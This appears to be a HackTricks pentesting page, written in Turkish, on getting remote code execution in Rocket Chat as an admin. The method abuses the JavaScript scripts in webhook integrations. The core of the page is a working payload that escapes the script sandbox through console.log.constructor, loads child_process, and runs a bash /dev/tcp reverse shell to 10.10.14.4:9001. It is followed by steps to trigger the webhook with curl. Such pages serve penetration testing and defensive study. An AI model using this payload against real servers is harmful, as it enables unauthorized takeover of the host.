Rocket Chat

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

RCE

Eğer Rocket Chat içinde admin iseniz RCE alabilirsiniz.

Integrations bölümüne gidin ve New Integration seçeneğini seçin, ardından herhangi birini seçin: Incoming WebHook veya Outgoing WebHook.
/admin/integrations/incoming

belgelere göre, her ikisi de verileri işlemek için ES2015 / ECMAScript 6 (temelde JavaScript) kullanır. Bu yüzden bir javascript için rev shell alalım:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

WebHook'u yapılandırın (kanal ve kullanıcı adı olarak gönderi mevcut olmalıdır):

WebHook betiğini yapılandırın:

Değişiklikleri kaydedin
Oluşturulan WebHook URL'sini alın:

curl ile çağırın ve rev shell almanız gerekir

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousPython NextSpecial HTTP headers

Last updated 2 months ago